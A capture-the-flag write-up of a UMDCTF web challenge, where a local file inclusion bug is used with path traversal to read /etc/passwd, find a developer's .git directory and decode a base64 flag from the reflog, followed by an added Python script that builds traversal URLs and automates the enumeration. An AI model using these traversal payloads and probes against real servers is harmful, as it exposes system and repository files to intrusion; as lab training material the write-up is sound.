SignStealingSoftware-P2

Description:

We are now in the system! Looks like the developers are still there, now we just need to find the key so we can create more user accounts, so our team can steal all the signs! http://159.89.228.183:8081

Foreword

A web exploitation challenge in UMDCTF, where we placed 1st internationally. Shoutout to the University of Maryland for hosting such a fun event :)

Introduction

When we log in to the given site, we immediately spot a local file inclusion (LFI) vulnerability in the way the presented gifs are loaded:

[screenshot]

As a result of the LFI, we can read the contents of any file the web server is allowed to open, but we cannot list directories, so we have no way to locate the files we are after. We thought of two possible approaches: (A) find a vulnerability in the source code, or (B) leak information about the system from well-known files and navigate our way to the flag.

Analysis

First of all, we checked how the source code works. Assuming this is a typical PHP page, we requested index.php through the LFI and got the following result:

[screenshot]

Erm, nothing interesting… We did try to turn the PHP file_get_contents call into RCE, and to make it load our own URLs (remote file inclusion), but all of these ideas failed: file_get_contents only returns a file's bytes and never executes them. Well, now for the approach that worked for us, option B.

When requesting ./../../../../etc/passwd, one can spot the existence of a few different user accounts. One of them, suspiciously, is called gitserver:

[screenshot]

Solving

All of a sudden, we had an "Aha!" moment; let's revisit the challenge description: "We are now in the system! Looks like the developers are still there". That must be the developers' user! We immediately checked whether a git repository exists in the gitserver user's home folder by requesting ./../../../../home/gitserver/.git/HEAD. From there we went through the files that commonly exist in a .git directory. A writeup of web2_200 from nullconCTF 2018 lists useful file paths inside .git, one of which is .git/logs/HEAD, the reflog of HEAD, which records every commit together with its message.

[screenshot]

After some more research, an idea struck us: the flag might be in a commit message! We read the log file's contents (./../../../../home/gitserver/.git/logs/HEAD):

[screenshot]

Aha! VU1EQ1RGLXtZbzBfS04wd19UaDNfTjNYdF9wMXRDSH0= is valid base64! We can decode it with the following command: echo 'VU1EQ1RGLXtZbzBfS04wd19UaDNfTjNYdF9wMXRDSH0=' | base64 -d

Flag: UMDCTF-{Yo0_KN0w_Th3_N3Xt_p1tCH}
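The whole chain above (traversal URL, picking candidate home directories out of /etc/passwd, probing well-known .git files, parsing the reflog and decoding base64 tokens from commit messages) as one script. This is an added example, not code from the writeup or the challenge: the LFI parameter name ("file") is an assumption, since the post never shows it, and the /etc/passwd and reflog contents below are constructed stand-ins for the real server responses (only the base64 string is taken from the writeup).

```python
"""Offline walk-through of the enumeration chain used in the writeup:
LFI -> /etc/passwd -> candidate home directories -> well-known .git files
-> reflog (.git/logs/HEAD) -> base64 candidates in commit messages.

Added example, not the challenge's code. The LFI parameter name is an
assumption (the post never shows it); all sample data below is constructed,
apart from the base64 string taken from the writeup."""
import base64
import re
from urllib.parse import quote

LFI_PARAM = "file"  # assumption: the gif loader reads a query parameter "file"


def lfi_url(base, path, depth=4):
    """Build the traversal URL for `path`, climbing `depth` directories."""
    traversal = "./" + "../" * depth + path.lstrip("/")
    return f"{base}?{LFI_PARAM}={quote(traversal)}"


def home_dirs(passwd_text):
    """Return {user: home} for /etc/passwd entries whose home is under /home."""
    homes = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[5].startswith("/home/"):
            homes[fields[0]] = fields[5]
    return homes


# Files present in nearly every .git directory, so cheap to probe over an LFI.
GIT_PROBES = ["HEAD", "config", "logs/HEAD", "COMMIT_EDITMSG", "ORIG_HEAD",
              "packed-refs", "refs/heads/master", "refs/heads/main"]


def git_probe_paths(home):
    """Absolute paths of the .git files worth requesting for one home directory."""
    return [f"{home}/.git/{name}" for name in GIT_PROBES]


def parse_reflog(text):
    """Parse reflog lines: '<old-sha> <new-sha> <ident> <ts> <tz>\\t<message>'."""
    entries = []
    for line in text.splitlines():
        if "\t" not in line:
            continue
        meta, message = line.split("\t", 1)
        parts = meta.split(" ")
        if len(parts) < 5:
            continue
        entries.append({
            "old": parts[0], "new": parts[1],
            "ident": " ".join(parts[2:-2]),   # "Name <email>", may contain spaces
            "timestamp": int(parts[-2]), "tz": parts[-1],
            "message": message,
        })
    return entries


B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_tokens(text):
    """Return the printable decodings of base64-looking tokens found in text."""
    found = []
    for token in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
            continue
        if decoded.isprintable():
            found.append(decoded)
    return found


def flags_from_reflog(reflog_text, marker="CTF"):
    """Decode every base64 token in every commit message; keep those containing `marker`."""
    return [decoded
            for entry in parse_reflog(reflog_text)
            for decoded in decode_base64_tokens(entry["message"])
            if marker in decoded]


# Constructed sample data standing in for the real server responses.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
    "gitserver:x:1000:1000::/home/gitserver:/bin/bash",
])
SAMPLE_REFLOG = "\n".join([
    "0" * 40 + " " + "1" * 40 + " Dev Eloper <dev@example.com> 1619740800 +0000"
    "\tcommit (initial): import sign stealing software",
    "1" * 40 + " " + "2" * 40 + " Dev Eloper <dev@example.com> 1619827200 +0000"
    "\tcommit: rotate signup key VU1EQ1RGLXtZbzBfS04wd19UaDNfTjNYdF9wMXRDSH0=",
])

if __name__ == "__main__":
    base = "http://159.89.228.183:8081/index.php"
    print(lfi_url(base, "/etc/passwd"))
    for home in home_dirs(SAMPLE_PASSWD).values():
        for path in git_probe_paths(home):
            print(lfi_url(base, path))
    print(flags_from_reflog(SAMPLE_REFLOG))
```

Against a live target you would feed the real responses into home_dirs and parse_reflog instead of the constructed strings; the reflog parser splits on the tab that separates the metadata from the message, so commit subjects containing spaces or colons are handled, and decode_base64_tokens drops anything that does not decode to printable ASCII so long hex or digit runs do not produce false hits.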